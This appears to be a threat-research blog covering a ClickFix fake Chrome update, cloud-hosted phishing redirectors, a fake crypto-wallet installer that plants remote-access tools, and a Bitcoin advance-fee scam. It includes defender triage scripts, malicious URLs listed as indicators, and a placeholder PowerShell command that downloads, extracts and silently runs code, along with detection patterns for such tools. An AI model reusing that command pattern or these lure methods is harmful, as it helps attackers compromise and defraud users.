Recently, I came across another ClickFix-style campaign pretending to install a Chrome security update. The campaign was hosted on:
teams-net-calls[.]com
The site impersonates a legitimate Microsoft Teams download page and attempts to trick users into manually executing a malicious PowerShell command under the guise of installing a browser security update.
When accessing the site, the victim initially sees what appears to be a legitimate Microsoft Teams download page. The page itself looks clean and convincing, using Microsoft branding and a fake Teams download interface.
However, the malicious behavior does not trigger immediately. The ClickFix flow is activated only after the user interacts with the page by clicking somewhere on it. After the click, the site displays a fake Chrome update popup claiming that a critical browser security update is required.
Requiring user interaction before displaying the malicious prompt may help the campaign avoid automated sandbox analysis and reduce detection by security crawlers that do not fully interact with page elements.
The popup then walks the user through a series of steps instructing them to manually execute a PowerShell command:
Press Win + X
Open PowerShell / Terminal
Paste the copied command
Press Enter
This social engineering approach avoids traditional browser download warnings because the victim manually executes the payload themselves.
After following the instructions, the victim ends up executing the following PowerShell command:
At first glance, the script looks somewhat harmless because it downloads a legitimate old Node.js package directly from the official Node.js website:
However, the second downloaded archive reveals the actual payload:
hxxps://instantwebupdate[.]com/get_update?i=77669
The script extracts both archives into:
C:\ProgramData\
and silently launches:
using hidden PowerShell execution flags such as:
-ExecutionPolicy Bypass -WindowStyle Hidden
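As an added example written for this page (not code from the original post or from the campaign), the following Python script shows how a defender can turn the command pattern above into a triage rule over process-creation telemetry: it scores PowerShell launches for the ClickFix traits just described (a console opened interactively by the user, `-ExecutionPolicy Bypass`, `-WindowStyle Hidden`, a web download, extraction under `C:\ProgramData`, and a child process started from that path). The events, hostnames and file names are constructed placeholders, and the weights and threshold are assumptions to tune against local telemetry.

```python
import re

# Constructed Sysmon-style process-creation events; not real telemetry from the
# campaign. Event 0 is a hypothetical stand-in for the ClickFix chain described
# above (two archive downloads, extraction under C:\ProgramData, hidden launch);
# every URL and file name in it is a placeholder, not a campaign indicator.
SAMPLE_EVENTS = [
    {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": (
            "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
            "\"iwr https://runtime.example.invalid/node.zip -OutFile C:\\ProgramData\\a.zip; "
            "iwr https://update.example.invalid/get_update?i=0 -OutFile C:\\ProgramData\\b.zip; "
            "Expand-Archive C:\\ProgramData\\a.zip C:\\ProgramData\\; "
            "Expand-Archive C:\\ProgramData\\b.zip C:\\ProgramData\\; "
            "Start-Process C:\\ProgramData\\node.exe C:\\ProgramData\\loader.js\""
        ),
    },
    {   # benign: inventory script started by the task scheduler
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
]

# Each rule: (name, weight, regex over the command line). Short aliases such as
# -ep / -w are included because the flags are rarely spelled out in full.
RULES = [
    ("bypass_policy", 1, re.compile(r"-(?:executionpolicy|ep|ex|exec)\s+bypass", re.I)),
    ("hidden_window", 2, re.compile(r"-(?:windowstyle|w|win)\s+hidden", re.I)),
    ("web_download", 2, re.compile(r"\b(?:iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget)\b", re.I)),
    ("archive_extract", 1, re.compile(r"\bexpand-archive\b", re.I)),
    ("programdata_drop", 1, re.compile(r"\\programdata\\", re.I)),
    ("spawn_from_drop", 2, re.compile(r"start-process\s+['\"]?c:\\programdata\\", re.I)),
]

# ClickFix relies on the victim pasting into a console they opened themselves,
# so the parent is a shell or the desktop, not a service host or scheduler.
INTERACTIVE_PARENTS = ("explorer.exe", "windowsterminal.exe", "cmd.exe")
ALERT_THRESHOLD = 5  # assumption: tune against local baseline


def score_event(event):
    """Return (score, hit_names) for one process-creation event."""
    image = event["image"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    cmd = event["command_line"]
    hits, score = [], 0
    for name, weight, rx in RULES:
        if rx.search(cmd):
            hits.append(name)
            score += weight
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    if parent in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
        score += 2
    return score, hits


def triage(events):
    """Return the events that reach the alert threshold, with their hits."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"command_line": ev["command_line"], "score": score, "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["score"], alert["hits"])
```

The benign scheduled script still trips `bypass_policy`, which is why a single flag is not enough on its own; the alert fires on the combination of interactive parent, hidden window, download and execution from the drop directory.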
The JavaScript payload itself is interesting because it uses a large fake “poem”-style wordlist to hide embedded files. Instead of storing binaries directly, the malware reconstructs files from mapped words and writes them to disk during execution.
The bundled DLLs (msvcp140.dll, vcruntime140.dll, and vcruntime140_1.dll) appear to be legitimate Visual C++ runtime dependencies rather than standalone malicious DLLs. They were likely included to ensure the dropped executable runs properly on victim systems.
At the time of analysis, no obvious C2 URLs were identified inside the EXE itself. Most visible URLs were related to Microsoft or DigiCert certificate infrastructure.
While continuing to monitor the infrastructure used in that campaign, I discovered several additional URLs hosted on Google Cloud Storage (storage[.]googleapis[.]com) that appear to be part of the same ecosystem. These pages act as intermediate redirectors, sending victims to a wide variety of phishing and scam sites hosted primarily on the .autos TLD.
What is interesting is that a single Google Cloud Storage page appears to function as a central redirect hub, distributing victims across multiple scam themes such as fake surveys, reward scams, antivirus alerts, job offers, and account storage warnings.
Newly Observed Google Cloud Storage URLs
The following URLs were identified during the investigation:
These pages typically present users with messages claiming they have been selected for a Netflix reward or promotional giveaway, encouraging them to complete a short survey to claim their prize.
Like the other scams in this campaign, the pages ultimately attempt to collect personal or payment information, often under the pretext of paying a small shipping fee or verifying eligibility.
Fake Dell Laptop Giveaway Survey
Another variation promotes a Dell laptop giveaway, typically claiming that users can win a Dell 16 DC16250 laptop worth $699.99.
During testing, this page was observed redirecting users to multiple phishing domains across different scam themes.
This suggests it is functioning as a traffic distribution or redirect infrastructure, allowing attackers to rotate phishing destinations while keeping the initial delivery URL stable.
Using Google Cloud Storage also adds a layer of trust, as the domain belongs to a legitimate cloud provider.
Another interesting observation is that a single .autos domain can serve multiple phishing page themes after redirection from the Google Cloud Storage page. Depending on the redirection path or parameters, the same domain may host different scams such as:
Fake surveys
Reward scams
Storage full alerts
Antivirus subscription warnings
Job offer lures
This behavior indicates that the attackers are likely using a shared phishing kit or centralized backend infrastructure, allowing them to quickly rotate scam themes while reusing the same domains.
Another observation is the high volume of phishing emails currently being distributed using this infrastructure. Over the past few days, I have been receiving around 40–50 phishing emails within a 24-hour period, many of which contain links to Google Cloud Storage pages that act as redirectors to the phishing ecosystem described in this report.
This campaign demonstrates how attackers continue to abuse trusted cloud infrastructure such as Google Cloud Storage to host redirectors that distribute victims to multiple phishing pages.
By using legitimate cloud services as part of the attack chain, threat actors can increase credibility and reduce the likelihood of immediate blocking.
The use of large numbers of disposable .autos domains further allows attackers to rotate phishing pages frequently while keeping the delivery infrastructure intact.
In addition, the system appears to restrict repeated access attempts from the same IP address. After a user successfully reaches a phishing page through the redirector, subsequent attempts to access similar URLs from the same IP may result in the page failing to load or redirecting to unrelated sites. This behavior suggests the presence of IP-based filtering or traffic distribution logic, commonly used in malicious traffic distribution systems (TDS) to control how often a visitor can access the phishing infrastructure.
In recent weeks, a highly organized phishing campaign has surfaced, characterized by its use of legitimate Google infrastructure to bypass standard security filters. I have identified more than 25 distinct phishing emails targeting a single account, all of which ultimately direct users to a specific URL:
The URL in question is hosted on Google Cloud Storage (GCS). To the average user or basic email security gateway, the domain googleapis.com appears trustworthy because it is a legitimate Google-owned domain used for hosting cloud assets.
In this specific case:
The Bucket: whilewait is a unique storage container created by the attacker within a Google Cloud project.
The Payload: comessuccess.html is a script-heavy file designed to act as a “gatekeeper” or “redirector”.
By hosting the initial link on Google’s servers, the attackers ensure the email passes authentication checks like SPF and DKIM. Once a user clicks, the HTML file on Google’s server silently redirects the browser to a third-party malicious site, often used for credit card harvesting or malware distribution.
Diversity of Social Engineering Tactics
More than 25 emails captured in this study demonstrate an exhaustive range of “hooks” designed to appeal to different psychological triggers. While the underlying technical path is identical, the presentation varies wildly:
Security Fears: Alerts regarding a “Critical Threat Detected” or “Antivirus Protection Expired”.
Retail Incentives: Reward offers from brands such as Lowe’s, T-Mobile, and State Farm.
Lifestyle & Health: Promotions for “Homemade Recipes”, “Harry & David Gift Baskets”, “Blood Sugar Watch” or “Neuropathy Pain” solutions.
Despite these different themes, the goal remains consistent: drive traffic to the whilewait storage bucket to initiate a fraudulent transaction or steal sensitive information.
The Final Objective: Credit Card Harvesting
Following the redirect from the Google Cloud link, users are typically presented with a “shipping fee” or “service charge” for their reward or security update. This is the Credit Card (CC) Harvesting phase. Any payment information entered on these secondary sites is captured by the attackers, leading to immediate financial fraud. This specific lure mirrors the tactics identified in recent threat research (link given below), where scareware emails are increasingly used to push users toward these fraudulent “subscription” or “service” portals.
To defend against this specific style of “Trusted-Platform Phishing”, the following steps are recommended:
Inspect the Redirect Path: Be aware that a link starting with storage.googleapis.com is not an official communication from Google; it is a file hosted by a third party using Google’s tools.
Verify Sender Metadata: Even if the link looks legitimate, the “From” address in these 25-plus samples often consists of unrelated, randomized alphanumeric strings.
Submit Infrastructure Abuse Reports: These campaigns rely on the longevity of the storage bucket. Reporting the whilewait bucket to the Google Cloud Abuse Team is the most effective way to dismantle the entire network of 25-plus emails at once.
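The three recommendations above, together with the earlier observation that a single Google Cloud Storage page acts as a redirect hub, can be turned into a mailbox triage script. The Python below is an added example written for this page, not code from the original post: it refangs links, identifies storage.googleapis.com object URLs in both path-style and bucket-hosted form, pulls out the bucket name (the thing you report), and applies the post’s sender heuristic (a local part that is a bare alphanumeric string). The messages, addresses and bucket names are constructed placeholders; the randomized-sender regex is a heuristic assumption and will also match some legitimate addresses, so treat it as a scoring signal, not a verdict.

```python
import re
from urllib.parse import urlsplit

# Constructed sample messages (sender + body); not real captured emails.
# Bucket and host names are placeholders, not the campaign's indicators.
SAMPLE_MESSAGES = [
    {"from": "x7k2p9qz4m@mail.example.invalid",
     "subject": "Critical Threat Detected",
     "body": "Your protection expired. Renew now: https://storage.googleapis.com/lure-bucket-a/gate.html"},
    {"from": "q83nv1lt0s@mail.example.invalid",
     "subject": "You have been selected",
     "body": "Claim your reward: hxxps://storage[.]googleapis[.]com/lure-bucket-b/go.html?c=1"},
    {"from": "newsletter@vendor.example.invalid",
     "subject": "Monthly update",
     "body": "Read more at https://www.vendor.example.invalid/blog/march"},
]

URL_RX = re.compile(r"https?://[^\s<>\"']+", re.I)
# Heuristic: 8+ characters, only letters and digits, at least one of each, no separators.
RANDOM_LOCALPART_RX = re.compile(r"^(?=.*\d)(?=.*[a-z])[a-z0-9]{8,}$", re.I)
GCS_HOST = "storage.googleapis.com"


def refang(text):
    """Undo common defanging so URL parsing works: hxxp -> http, [.] -> ."""
    text = re.sub(r"hxxp", "http", text, flags=re.I)
    return text.replace("[.]", ".").replace("(.)", ".")


def gcs_object(url):
    """Return (bucket, object) for a Google Cloud Storage object link, else None.
    Handles storage.googleapis.com/<bucket>/<object> and <bucket>.storage.googleapis.com/<object>."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path.lstrip("/")
    if host == GCS_HOST:
        bucket, _, obj = path.partition("/")
        return (bucket, obj) if bucket else None
    if host.endswith("." + GCS_HOST):
        return (host[: -len("." + GCS_HOST)], path)
    return None


def looks_randomized(sender):
    """The post's sender heuristic: a From local part that is an unrelated alphanumeric string."""
    local = sender.split("@", 1)[0]
    return bool(RANDOM_LOCALPART_RX.match(local))


def triage_message(msg):
    """Extract GCS redirector links from one message and combine with the sender check."""
    findings = {"gcs_links": [], "randomized_sender": looks_randomized(msg["from"])}
    for url in URL_RX.findall(refang(msg["body"])):
        hit = gcs_object(url)
        if hit:
            findings["gcs_links"].append({"url": url, "bucket": hit[0], "object": hit[1]})
    findings["suspicious"] = bool(findings["gcs_links"]) and findings["randomized_sender"]
    return findings


def buckets_to_report(messages):
    """Count lures per bucket: one abuse report on a bucket removes every lure that points at it."""
    counts = {}
    for msg in messages:
        for link in triage_message(msg)["gcs_links"]:
            counts[link["bucket"]] = counts.get(link["bucket"], 0) + 1
    return counts


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print(msg["subject"], triage_message(msg))
    print("buckets to report:", buckets_to_report(SAMPLE_MESSAGES))
```

Because the hub pattern means many emails share one bucket, `buckets_to_report` is the aggregate worth acting on: a bucket referenced by dozens of differently themed lures is the single point that an abuse report to the provider can remove.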
I recently came across a phishing campaign impersonating the Yoroi Desktop Wallet, targeting cryptocurrency users with what looked like a legitimate upgrade.
The email itself was clean and well-written. It talked about improved security, hardware wallet support, and even AI-based scam detection. Nothing immediately stood out as suspicious. The landing page looked polished too, with proper branding and a familiar layout.
The Setup
The phishing email redirects users to a domain:
hxxps://download[.]v1desktop-yoroiwallet[.]com/
The domain was recently registered (Feb 2026), yet it was already indexed on Google, meaning users could also land on it via search results, not just email.
The Download That Isn’t a Wallet
The site promotes a “Yoroi Desktop” download, but instead of hosting anything legitimate, it redirects to a file-sharing service and delivers an MSI file:
Once executed, the system is quietly enrolled into a remote access setup. There’s no obvious warning, no suspicious pop-ups, just a legitimate tool being used in the wrong way.
Looking at the configuration reveals what’s happening behind the scenes:
This isn’t random. It shows the machine is being registered into a pre-configured remote access fleet, controlled by whoever owns that GoTo Resolve tenant.
At this point, the attacker doesn’t need to trick the user anymore. They already have what they need: persistent access to the device.
One thing that stands out across both campaigns is how the payload is delivered.
In all cases, the final MSI files are not hosted directly on the phishing domains. Instead, the sites redirect users to gofile[.]io, a legitimate file-sharing service, to download the installer.
This adds another layer of evasion. Hosting the MSI on a legitimate service like gofile makes it harder to block and also reduces suspicion from users, since the download doesn’t come directly from the phishing domain.
While digging further into this, I also noticed that the MSI files are hosted across multiple gofile storage endpoints such as:
store-na-phx-[1/4/5].gofile.io/download/direct/
Changing the server index (for example, 1, 4, or 5) reveals similar download paths hosting MSI files that follow the same theme: crypto wallet installers that actually deploy RMM tools.
Combined with the use of legitimate tools like GoTo Resolve (LogMeIn) and delivery through trusted file-sharing services, the overall chain appears clean on the surface but ultimately leads to full remote access.
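The delivery chain just described (a freshly registered lure domain that hands off to a gofile direct-download endpoint for an MSI) is something proxy or web-filter logs can surface without knowing the specific domain in advance. The Python below is an added example written for this page, not code from the original post: it generalises the observed store-na-phx-[1/4/5].gofile.io hosts into a host pattern (the assumption being that the endpoints follow store-<region>-<city>-<n>.gofile.io), looks for installer downloads from such endpoints, and correlates the HTTP Referer with a table of domain registration dates to flag hand-offs from domains younger than a chosen age. The log records, domains and dates are constructed placeholders; in production the registration dates would come from a WHOIS/RDAP lookup and the registrable-domain split from a public-suffix library.

```python
import re
from datetime import date
from urllib.parse import urlsplit

# Constructed proxy log records: (timestamp, client, host, path, referer).
# Not real telemetry; hostnames outside the gofile pattern are placeholders.
SAMPLE_LOG = [
    ("2026-02-20T10:01:02Z", "10.0.0.5", "download.wallet-lure.invalid", "/", "-"),
    ("2026-02-20T10:01:09Z", "10.0.0.5", "store-na-phx-4.gofile.io",
     "/download/direct/abc123/wallet-setup.msi", "https://download.wallet-lure.invalid/"),
    ("2026-02-20T10:30:00Z", "10.0.0.9", "store-eu-par-2.gofile.io",
     "/download/direct/def456/photos.zip", "https://chat.collab.invalid/"),
    ("2026-02-20T11:00:00Z", "10.0.0.7", "updates.vendor.invalid", "/setup/agent.msi", "-"),
]

# Constructed registration dates standing in for WHOIS/RDAP results; placeholders.
DOMAIN_CREATED = {
    "wallet-lure.invalid": date(2026, 2, 12),
    "collab.invalid": date(2019, 6, 1),
    "vendor.invalid": date(2015, 3, 9),
}

# Assumed generalisation of the observed store-na-phx-[1/4/5] endpoints.
GOFILE_DIRECT_RX = re.compile(r"^store-[a-z]{2}-[a-z]{3}-\d+\.gofile\.io$", re.I)
INSTALLER_RX = re.compile(r"\.(?:msi|exe)$", re.I)
NEW_DOMAIN_DAYS = 30  # assumption: what counts as "recently registered"


def registrable_domain(host):
    """Crude eTLD+1 (last two labels); enough for the constructed data, use a PSL library in production."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:])


def domain_age_days(host, created, today):
    """Days since registration of the host's registrable domain, or None if unknown."""
    base = registrable_domain(host)
    if base not in created:
        return None
    return (today - created[base]).days


def is_gofile_direct_installer(host, path):
    """True for an .msi/.exe fetched through a gofile direct-download storage endpoint."""
    return (bool(GOFILE_DIRECT_RX.match(host))
            and path.startswith("/download/direct/")
            and bool(INSTALLER_RX.search(path)))


def find_delivery_chains(log, created, today):
    """Installer downloads from gofile whose Referer is a recently registered domain."""
    chains = []
    for _ts, client, host, path, referer in log:
        if not is_gofile_direct_installer(host, path):
            continue
        ref_host = urlsplit(referer).hostname if referer != "-" else None
        age = domain_age_days(ref_host, created, today) if ref_host else None
        if age is not None and age <= NEW_DOMAIN_DAYS:
            chains.append({"client": client, "referer_host": ref_host,
                           "referer_age_days": age, "file": path.rsplit("/", 1)[-1]})
    return chains


if __name__ == "__main__":
    for chain in find_delivery_chains(SAMPLE_LOG, DOMAIN_CREATED, date(2026, 2, 20)):
        print(chain)
```

The zip fetched from another gofile endpoint and the MSI fetched from a long-established vendor domain are both left alone; only the installer whose referer is an eight-day-old domain is reported, which is the shape of the chain described above.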
I recently came across a message containing the following link:
hxxps://yandex[.]com/poll/PdZ7vgekGrNakuXZcpiB6b
At first, it didn’t look suspicious. It opened as a simple survey/poll page. But as I continued, the flow quickly shifted into a crypto reward scenario, claiming that I was eligible to receive a Bitcoin compensation payment.
And as expected with these kinds of lures, there’s a catch.
Before you can withdraw the funds, you’re asked to pay a small “commission” fee.
Full Scam Walkthrough (Video)
This gives a better idea of how smoothly the entire flow is designed to push the victim toward payment.
Infection / Lure flow
1. Initial Entry (Survey / Poll Page)
The flow starts with a Yandex poll link, which works as a kind of entry point.
This step likely serves multiple purposes. It helps make the interaction feel legitimate since it’s hosted on a known platform. It may also act as a basic filter to distinguish real users from automated systems. More importantly, it sets up the next stage of redirection.
2. Fake Bitcoin Compensation Page
After interacting with the poll, I was redirected to a page that looks like it belongs to a Bitcoin-related service.
The page presents a sense of urgency by claiming that a new transaction of 0.943 BTC has been created and already marked as approved. It then introduces pressure by warning the user to withdraw the funds within 24 hours, a tactic commonly used to rush victims into taking immediate action without verifying the legitimacy of the claim.
This is where the emotional hook kicks in. Seeing a large amount like 0.943 BTC immediately grabs attention.
3. Social Engineering via Chat Assistant
Then a chat window appears, introducing a support agent.
The message explains that to complete the payment process, you need to register your profile in a compensation system. It sounds procedural and official, which is exactly the intention.
Shortly after, the real objective becomes clear.
You are asked to:
Pay $67 for legal profile registration services
4. Payment Gateway
Clicking the payment link takes you to a dedicated payment page.
Here, everything is carefully designed to appear legitimate and trustworthy. The page shows a specific payment amount of $67, provides a Bitcoin payment option via a QR code, and displays a wallet address to reinforce authenticity. On top of that, a countdown timer indicating invoice expiry adds urgency, subtly pressuring the user to complete the transaction quickly without questioning its validity.
The design mimics real crypto payment processors, which helps reduce suspicion.
The flow is quite structured and intentional.
It starts by engaging the user through a trusted platform, which lowers initial suspicion. Then it introduces a high-value crypto reward, creating excitement. A chat assistant adds a layer of interaction, making the process feel guided and legitimate.
Finally, the user is asked to pay a relatively small fee to unlock a much larger reward.
This is essentially an advance fee scam, adapted to fit into a crypto-themed narrative.
Additional Variant Observed (Octa-Themed Flow)
While analyzing further, I encountered another link that follows the same backend scam logic, but with a different initial presentation.
The flow eventually leads to the same outcome: pay a commission to withdraw BTC.
Variant Walkthrough (Video)
1. Fake Account / Transfer Notification
This version starts with a fake dashboard impersonating Octa.
The page further attempts to lure users by displaying a message stating “You have a new money transfer”, along with a balance of 1.824 BTC. This presentation is crafted to create excitement and curiosity, making it seem like the user has unexpectedly received funds, while subtly encouraging them to engage with the page and follow the next steps without questioning its authenticity.
2. Fake Login & Temporary Password Flow
The user is asked to log in using a temporary password.
This step closely mimics real authentication flows to build trust and credibility. It displays a temporary password, includes an OTP style input field, and reinforces legitimacy with messaging like “Do not share this password!”. These familiar elements are designed to make the process feel secure and authentic, lowering suspicion while guiding the user further into the flow.
3. Transaction Dashboard
After logging in, the user is presented with a dashboard that appears highly convincing, displaying details such as the sender labeled as Octa, a balance of 1.824 BTC, and a status marked as paid. The layout, wording, and transaction details are all carefully crafted to create a sense of authenticity, making the entire interface look legitimate and encouraging the user to trust the process without suspicion.
4. Commission Justification
Before allowing any withdrawal, the platform introduces an additional requirement in the form of a commission fee of around $69, accompanied by an explanation about wallet limits and transfer rules. This step is designed to appear reasonable and procedural, giving the impression that the fee is a standard part of the process while subtly nudging the user to make a payment in order to access the supposed funds.
5. Payment Page
Just like the initial flow, the process ultimately leads to a familiar payment stage, presenting a Bitcoin payment request along with a QR code and a wallet address for convenience. An expiry timer is also displayed to create urgency, pressuring the user to act quickly and complete the payment without taking the time to question the legitimacy of the request.
What stands out is how the attackers reuse the same core scam but change the entry point.
I also looked into related activity on URLScan and found similar lures being actively scanned in the last couple of days, which indicates that this is not a one-off campaign but something currently active and evolving.
Indicators of Compromise (IOCs)
URLs
Along with the observed infrastructure, I checked domain registration timelines, which further indicate that this campaign is relatively recent and actively being used.